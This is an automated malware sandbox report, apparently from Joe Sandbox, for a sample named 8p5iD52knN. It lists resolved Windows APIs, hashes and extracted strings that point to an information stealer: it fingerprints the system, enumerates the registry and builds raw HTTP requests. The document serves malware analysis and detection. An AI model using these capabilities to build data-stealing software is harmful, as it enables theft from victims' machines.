                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: InfoLocale
                    • String ID:
                    • API String ID: 2299586839-0
                    • Opcode ID: b9dbded4df740f95a366ffb3c725a865bd77cd50a76c54eebdafbaeb84b8c7b9
                    • Instruction ID: e83552b6022aae669f2d5c27f359814ee46eaea323ddb5c136f95371eef2deca
                    • Opcode Fuzzy Hash: b9dbded4df740f95a366ffb3c725a865bd77cd50a76c54eebdafbaeb84b8c7b9
                    • Instruction Fuzzy Hash: 0FF0A470A04209AFEB15DE91CC41A9EF7BAF7C4714F40847AA610762C1E7B86A048698
                    APIs
                    • CoCreateInstance.OLE32(0041B0DC,00000000,00000005,0040A4CC,00000000,?,00000000,0040A52D,0041A69E), ref: 0040A4BC
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateInstance
                    • String ID:
                    • API String ID: 542301482-0
                    • Opcode ID: 7b7d34e0f70cbabb5746a0b5785e83bae371d3c5d3f6c4cc1dc965a66d09d6f2
                    • Instruction ID: ecfa08d63a5e99a02bf1f10941cb6c6ba3816feefb3116676bc77a3be9f2b9a2
                    • Opcode Fuzzy Hash: 7b7d34e0f70cbabb5746a0b5785e83bae371d3c5d3f6c4cc1dc965a66d09d6f2
                    • Instruction Fuzzy Hash: E5C002953917243AE551B2AA2CCAF5B418C4B88B59F214177B618F61D2A5E85C2001AE
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908645420.000000000061F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0061F000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_61f000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b45195dd31b221fbb09478d2c584d7bb78475a2a599777f6b4d9a6f7db87f26d
                    • Instruction ID: 6fb67732f4a9a656f062a0a1282118566c73178d40539d3e0fac5baac77657bf
                    • Opcode Fuzzy Hash: b45195dd31b221fbb09478d2c584d7bb78475a2a599777f6b4d9a6f7db87f26d
                    • Instruction Fuzzy Hash: A1C1A29680E3C25FDB078B745C792917F706E2B10975E86DFC4C68E8E7E2988486D363
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908645420.000000000061F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0061F000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_61f000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: da1566a2f6af9372ef5ff0064129cc8c7bd33331f23317b37220a35c5510ad97
                    • Instruction ID: 0c47d064375a7c6926ec4af01915e762942a65c6bed9016b76a5bd20d10caa7d
                    • Opcode Fuzzy Hash: da1566a2f6af9372ef5ff0064129cc8c7bd33331f23317b37220a35c5510ad97
                    • Instruction Fuzzy Hash: 9FF0AF76A00A148FEB20CF24E845BAA73A6EB8530AF1444A4D90AD7246D330A9418E90
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c2a2d129c8543363c052d008b34330d58e57021dec0e7df0c1a6226ed5b22a4b
                    • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                    • Opcode Fuzzy Hash: c2a2d129c8543363c052d008b34330d58e57021dec0e7df0c1a6226ed5b22a4b
                    • Instruction Fuzzy Hash:
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00419155), ref: 0040562D
                    • GetProcAddress.KERNEL32(00000000,ExpandEnvironmentStringsW), ref: 0040563C
                    • GetProcAddress.KERNEL32(00000000,GetComputerNameW), ref: 0040564E
                    • GetProcAddress.KERNEL32(00000000,GlobalMemoryStatus), ref: 00405660
                    • GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 00405672
                    • GetProcAddress.KERNEL32(00000000,GetFileSize), ref: 00405684
                    • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00405696
                    • GetProcAddress.KERNEL32(00000000,ReadFile), ref: 004056A8
                    • GetProcAddress.KERNEL32(00000000,GetFileAttributesW), ref: 004056BA
                    • GetProcAddress.KERNEL32(00000000,CreateMutexA), ref: 004056CC
                    • GetProcAddress.KERNEL32(00000000,ReleaseMutex), ref: 004056DE
                    • GetProcAddress.KERNEL32(00000000,GetLastError), ref: 004056F0
                    • GetProcAddress.KERNEL32(00000000,GetCurrentDirectoryW), ref: 00405702
                    • GetProcAddress.KERNEL32(00000000,SetEnvironmentVariableW), ref: 00405714
                    • GetProcAddress.KERNEL32(00000000,GetEnvironmentVariableW), ref: 00405726
                    • GetProcAddress.KERNEL32(00000000,SetCurrentDirectoryW), ref: 00405738
                    • GetProcAddress.KERNEL32(00000000,FindFirstFileW), ref: 0040574A
                    • GetProcAddress.KERNEL32(00000000,FindNextFileW), ref: 0040575C
                    • GetProcAddress.KERNEL32(00000000,LocalFree), ref: 0040576E
                    • GetProcAddress.KERNEL32(00000000,GetTickCount), ref: 00405780
                    • GetProcAddress.KERNEL32(00000000,CopyFileW), ref: 00405792
                    • GetProcAddress.KERNEL32(00000000,FindClose), ref: 004057A4
                    • GetProcAddress.KERNEL32(00000000,GlobalMemoryStatusEx), ref: 004057B6
                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 004057C8
                    • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 004057DA
                    • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 004057EC
                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameW), ref: 004057FE
                    • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00405810
                    • GetProcAddress.KERNEL32(00000000,GetLocaleInfoA), ref: 00405822
                    • GetProcAddress.KERNEL32(00000000,GetLocalTime), ref: 00405834
                    • GetProcAddress.KERNEL32(00000000,GetTimeZoneInformation), ref: 00405846
                    • GetProcAddress.KERNEL32(00000000,RemoveDirectoryW), ref: 00405858
                    • GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 0040586A
                    • GetProcAddress.KERNEL32(00000000,GetLogicalDriveStringsA), ref: 0040587C
                    • GetProcAddress.KERNEL32(00000000,GetDriveTypeA), ref: 0040588E
                    • GetProcAddress.KERNEL32(00000000,CreateProcessW), ref: 004058A0
                    • LoadLibraryA.KERNEL32(advapi32.dll,00000000,CreateProcessW,00000000,GetDriveTypeA,00000000,GetLogicalDriveStringsA,00000000,DeleteFileW,00000000,RemoveDirectoryW,00000000,GetTimeZoneInformation,00000000,GetLocalTime,00000000), ref: 004058AF
                    • GetProcAddress.KERNEL32(00000000,GetUserNameW), ref: 004058BE
                    • GetProcAddress.KERNEL32(00000000,RegCreateKeyExW), ref: 004058D0
                    • GetProcAddress.KERNEL32(00000000,RegQueryValueExW), ref: 004058E2
                    • GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 004058F4
                    • GetProcAddress.KERNEL32(00000000,RegOpenKeyExW), ref: 00405906
                    • GetProcAddress.KERNEL32(00000000,AllocateAndInitializeSid), ref: 00405918
                    • GetProcAddress.KERNEL32(00000000,LookupAccountSidA), ref: 0040592A
                    • GetProcAddress.KERNEL32(00000000,CreateProcessAsUserW), ref: 0040593C
                    • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0040594E
                    • GetProcAddress.KERNEL32(00000000,RegOpenKeyW), ref: 00405960
                    • GetProcAddress.KERNEL32(00000000,RegEnumKeyW), ref: 00405972
                    • GetProcAddress.KERNEL32(00000000,RegEnumValueW), ref: 00405984
                    • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00405996
                    • GetProcAddress.KERNEL32(00000000,CryptCreateHash), ref: 004059A8
                    • GetProcAddress.KERNEL32(00000000,CryptHashData), ref: 004059BA
                    • GetProcAddress.KERNEL32(00000000,CryptGetHashParam), ref: 004059CC
                    • GetProcAddress.KERNEL32(00000000,CryptDestroyHash), ref: 004059DE
                    • GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 004059F0
                    • LoadLibraryA.KERNEL32(user32.dll,00000000,CryptReleaseContext,00000000,CryptDestroyHash,00000000,CryptGetHashParam,00000000,CryptHashData,00000000,CryptCreateHash,00000000,CryptAcquireContextA,00000000,RegEnumValueW,00000000), ref: 004059FF
                    • GetProcAddress.KERNEL32(75BD0000,EnumDisplayDevicesW), ref: 00405A14
                    • GetProcAddress.KERNEL32(75BD0000,wvsprintfA), ref: 00405A29
                    • GetProcAddress.KERNEL32(75BD0000,GetKeyboardLayoutList), ref: 00405A3E
                    • LoadLibraryA.KERNEL32(shell32.dll,75BD0000,GetKeyboardLayoutList,75BD0000,wvsprintfA,75BD0000,EnumDisplayDevicesW,user32.dll,00000000,CryptReleaseContext,00000000,CryptDestroyHash,00000000,CryptGetHashParam,00000000,CryptHashData), ref: 00405A4D
                    • GetProcAddress.KERNEL32(75DA0000,ShellExecuteExW), ref: 00405A62
                    • LoadLibraryA.KERNEL32(ntdll.dll,75DA0000,ShellExecuteExW,shell32.dll,75BD0000,GetKeyboardLayoutList,75BD0000,wvsprintfA,75BD0000,EnumDisplayDevicesW,user32.dll,00000000,CryptReleaseContext,00000000,CryptDestroyHash,00000000), ref: 00405A71
                    • GetProcAddress.KERNEL32(76E90000,RtlComputeCrc32), ref: 00405A86
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$LibraryLoad
                    • String ID: AllocateAndInitializeSid$CheckTokenMembership$CloseHandle$CopyFileW$CreateFileW$CreateMutexA$CreateProcessAsUserW$CreateProcessW$CreateToolhelp32Snapshot$CryptAcquireContextA$CryptCreateHash$CryptDestroyHash$CryptGetHashParam$CryptHashData$CryptReleaseContext$DeleteFileW$EnumDisplayDevicesW$ExpandEnvironmentStringsW$FindClose$FindFirstFileW$FindNextFileW$GetComputerNameW$GetCurrentDirectoryW$GetDriveTypeA$GetEnvironmentVariableW$GetFileAttributesW$GetFileSize$GetKeyboardLayoutList$GetLastError$GetLocalTime$GetLocaleInfoA$GetLogicalDriveStringsA$GetModuleFileNameW$GetTickCount$GetTimeZoneInformation$GetUserNameW$GlobalMemoryStatus$GlobalMemoryStatusEx$LocalFree$LookupAccountSidA$Process32FirstW$Process32NextW$ReadFile$RegCloseKey$RegCreateKeyExW$RegEnumKeyW$RegEnumValueW$RegOpenKeyExW$RegOpenKeyW$RegQueryValueExW$ReleaseMutex$RemoveDirectoryW$RtlComputeCrc32$SetCurrentDirectoryW$SetDllDirectoryW$SetEnvironmentVariableW$ShellExecuteExW$advapi32.dll$kernel32.dll$ntdll.dll$shell32.dll$user32.dll$wvsprintfA
                    • API String ID: 2238633743-617434850
                    • Opcode ID: ed6a8e92284a318c94f0322e28525f172068a9e89f8e16d42c814494dd58fb50
                    • Instruction ID: cfd24dbd3a5623e96a1366eeff91a6eabf16f5ed4c2f56b33555d19b2fe062a0
                    • Opcode Fuzzy Hash: ed6a8e92284a318c94f0322e28525f172068a9e89f8e16d42c814494dd58fb50
                    • Instruction Fuzzy Hash: AEC174B1A80710ABDB01EFA5DC8AA6A37A8FB45705360953BB544FF2D1D678DC018F9C
                    APIs
                    • CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D), ref: 004083C7
                    • CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%appdata%\,00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D), ref: 00408435
                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D,?,?,?,00000000), ref: 004084E4
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040850D
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408530
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408553
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408576
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408599
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004085BC
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004085DF
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408602
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408625
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408648
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040866B
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040868E
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004086B1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$CreateDirectory$LibraryLoad
                    • String ID: %TEMP%\$%appdata%\$PATH
                    • API String ID: 1305945209-1089150275
                    • Opcode ID: 1a33a2769e6321904e3cdb265ad9754a853bf74ca40744ee91329e9d7d30e973
                    • Instruction ID: 107c2c44d9e3562d342af0426f92bc8293728700e54ee15747b3200e896e575f
                    • Opcode Fuzzy Hash: 1a33a2769e6321904e3cdb265ad9754a853bf74ca40744ee91329e9d7d30e973
                    • Instruction Fuzzy Hash: 08C12A709002059BDB01EBA9DD86BCE77B8EF49308F20457BB454BB2D6CB78AD05CB59
                    APIs
                    • CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D), ref: 004083C7
                    • CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%appdata%\,00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D), ref: 00408435
                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D,?,?,?,00000000), ref: 004084E4
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040850D
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408530
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408553
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408576
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408599
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004085BC
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004085DF
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408602
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408625
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408648
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040866B
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040868E
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004086B1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$CreateDirectory$LibraryLoad
                    • String ID: %TEMP%\$%appdata%\$PATH
                    • API String ID: 1305945209-1089150275
                    • Opcode ID: 79934f1c985d954dbaeb093b53ec4003d150750486ead7d04ba29fc2d927e3f7
                    • Instruction ID: 2d8dd4a76802c8c05b7f9f6fb250e21a54e9375513618aa46567d80ce5eb0686
                    • Opcode Fuzzy Hash: 79934f1c985d954dbaeb093b53ec4003d150750486ead7d04ba29fc2d927e3f7
                    • Instruction Fuzzy Hash: A7C12A70A002059BDB01EBA9DD86BCE77B8EF45308F20453BB454BB3D5CB78AD058B59
                    APIs
                    • CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D), ref: 004083C7
                    • CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%appdata%\,00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D), ref: 00408435
                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D,?,?,?,00000000), ref: 004084E4
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040850D
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408530
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408553
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408576
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408599
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004085BC
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004085DF
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408602
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408625
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408648
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040866B
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040868E
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004086B1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$CreateDirectory$LibraryLoad
                    • String ID: %TEMP%\$%appdata%\$PATH
                    • API String ID: 1305945209-1089150275
                    • Opcode ID: 3e01a980fe06b71006a212d9f424134b77ef2a0a464c1b07fa2ce8f8b0dee680
                    • Instruction ID: f743aedec7dbf6b98949553c7d40f8bccc431f9c9a4af862cbdb08e619508236
                    • Opcode Fuzzy Hash: 3e01a980fe06b71006a212d9f424134b77ef2a0a464c1b07fa2ce8f8b0dee680
                    • Instruction Fuzzy Hash: A0C11A70A002059BDB01EBA9DD86BCE77B8EF48309F20453BB454BB3D5DB78AD058B59
                    APIs
                    • GetModuleHandleA.KERNEL32(00000000,00000000,00418535,?,00000000,00000000,?,00418B28,00000000,?,?,?,?,?,0041B0FC,0000044D), ref: 004181B0
                    • LoadLibraryA.KERNEL32(00000000,00000000,00000000,00418535,?,00000000,00000000,?,00418B28,00000000,?,?,?,?,?,0041B0FC), ref: 004181C4
                    • GetProcAddress.KERNEL32(00000000,-0000000C), ref: 004181D8
                    • GetProcAddress.KERNEL32(00000000,-00000017), ref: 004181EF
                    • GetProcAddress.KERNEL32(00000000,-00000025), ref: 00418206
                    • GetProcAddress.KERNEL32(00000000,-0000002C), ref: 0041821D
                    • GetProcAddress.KERNEL32(00000000,-00000031), ref: 00418234
                    • GetProcAddress.KERNEL32(00000000,-00000036), ref: 0041824B
                    • GetProcAddress.KERNEL32(00000000,-0000003C), ref: 00418262
                    • GetProcAddress.KERNEL32(00000000,-00000044), ref: 00418279
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$HandleLibraryLoadModule
                    • String ID: $$ HTTP/1.0$Connection: close$Content-Length: $Host: $Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)$User-agent: $wsock32.dll
                    • API String ID: 384173800-3355491746
                    • Opcode ID: d526fbe7ccd9f0a4c94f3e7aa4b99a8f53a2d889cf2d38f87e34366e75e6ed91
                    • Instruction ID: acd65350bdfe250b2cabb462dd412f1b2f53023e341749034ab9d15be0839763
                    • Opcode Fuzzy Hash: d526fbe7ccd9f0a4c94f3e7aa4b99a8f53a2d889cf2d38f87e34366e75e6ed91
                    • Instruction Fuzzy Hash: 85B1DFB1940219AFDB11EF65CC86BDF7BB8EF44306F50407BF504B2291DB789A458E58
                    APIs
                    • GetSystemMetrics.USER32(00000000), ref: 004173D7
                    • GetSystemMetrics.USER32(00000001), ref: 004173EE
                      • Part of subcall function 00416748: GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C
                    • Sleep.KERNEL32(00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ,?,004175A8,?,Layouts: ,?), ref: 004174A3
                      • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
                      • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
                      • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
                      • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
                      • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
                      • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D
                    • Sleep.KERNEL32(00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ), ref: 004174CD
                    • Sleep.KERNEL32(00000001,004175A8,[Soft],?,00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ), ref: 004174EC
                      • Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020019,0041A69E,00000000,00416452,?,-00000001,0041B0FC,?,00000000,00000000,?,004174F9,00000001), ref: 00415F8D
                      • Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 00416115
                      • Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,0041A69E,0041A69E,00000001,?,000003E9,),?,?,00000000,00416528,?,?), ref: 00416150
                      • Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 004162D8
                      • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressLibraryLoadProcSleepSystem$EnumMetricsOpen$FreeInfoString
                    • String ID: $Computer(Username) : $EXE_PATH : $Layouts: $LocalTime: $MachineID : $Screen: $Windows : $Zone: $[Soft]
                    • API String ID: 75899496-943277980
                    • Opcode ID: 4be26f394024ad5c91b88013eb9f7e22f1757fe5255d0d7559962d2f1b93f894
                    • Instruction ID: faa4580c3751e67dc94fa71ed2fe839e62200f283c7ef28ebc39c5cb7ba49714
                    • Opcode Fuzzy Hash: 4be26f394024ad5c91b88013eb9f7e22f1757fe5255d0d7559962d2f1b93f894
                    • Instruction Fuzzy Hash: 94814F70A44209AFCB01FFA1CC42BCDBF7AAF49309F60407BB104B65D6D67D9A568B19
                    APIs
                    • GetSystemMetrics.USER32(00000000), ref: 004173D7
                    • GetSystemMetrics.USER32(00000001), ref: 004173EE
                      • Part of subcall function 00416748: GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C
                    • Sleep.KERNEL32(00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ,?,004175A8,?,Layouts: ,?), ref: 004174A3
                      • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
                      • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
                      • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
                      • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
                      • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
                      • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D
                    • Sleep.KERNEL32(00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ), ref: 004174CD
                    • Sleep.KERNEL32(00000001,004175A8,[Soft],?,00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ), ref: 004174EC
                      • Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020019,0041A69E,00000000,00416452,?,-00000001,0041B0FC,?,00000000,00000000,?,004174F9,00000001), ref: 00415F8D
                      • Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 00416115
                      • Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,0041A69E,0041A69E,00000001,?,000003E9,),?,?,00000000,00416528,?,?), ref: 00416150
                      • Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 004162D8
                      • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressLibraryLoadProcSleepSystem$EnumMetricsOpen$FreeInfoString
                    • String ID: $Computer(Username) : $EXE_PATH : $Layouts: $LocalTime: $MachineID : $Screen: $Windows : $Zone: $[Soft]
                    • API String ID: 75899496-943277980
                    • Opcode ID: c1c0bba0cf5750b68568b08facd4bf438261c5427543421f404452287209528a
                    • Instruction ID: 915cc31ebaf767ee9912e0c916b5d60c1651ad94c460c6a34579714c0f7d2b16
                    • Opcode Fuzzy Hash: c1c0bba0cf5750b68568b08facd4bf438261c5427543421f404452287209528a
                    • Instruction Fuzzy Hash: 9A814E70A44209AFCB01FFA1CC42BCDBF7AAF49309F60407BB104B65D6D67D9A468B19
                    APIs
                    • GetSystemMetrics.USER32(00000000), ref: 004173D7
                    • GetSystemMetrics.USER32(00000001), ref: 004173EE
                      • Part of subcall function 00416748: GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C
                    • Sleep.KERNEL32(00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ,?,004175A8,?,Layouts: ,?), ref: 004174A3
                      • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
                      • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
                      • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
                      • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
                      • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
                      • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D
                    • Sleep.KERNEL32(00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ), ref: 004174CD
                    • Sleep.KERNEL32(00000001,004175A8,[Soft],?,00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ), ref: 004174EC
